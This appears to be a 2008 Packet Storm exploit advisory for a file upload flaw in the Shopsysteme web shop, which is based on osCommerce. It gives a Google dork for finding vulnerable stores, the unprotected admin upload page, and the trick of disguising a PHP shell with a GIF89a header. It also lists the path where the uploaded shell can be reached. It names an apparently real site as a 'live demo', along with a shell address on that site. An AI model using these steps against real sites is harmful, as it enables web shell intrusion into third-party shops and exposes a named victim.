Shopsysteme File Upload Vulnerability

2008-12-17T00:00:00
ID PACKETSTORM:73094
Type packetstorm
Reporter mNt
Modified 2008-12-17T00:00:00

Description

                                        
                                            `## Script Name: Shopsysteme (new version oscommerce)  
  
## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro) :)   
  
## Author: mNt  
  
## File Upload Bug  
  
## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)]  
  
## Use:  
  
http://www.example.com/  
  
after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php  
  
File uploaded php shell  
  
after in url: http://www.example.com/images/upload/mNt.php  
  
Attention: Shell Code İn GIF89;a  
  
## Live demo: http://www.trampleandfetish.de/admin/editor/image.php  
  
## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php  
  
## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage  
  
## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net  
  
  
`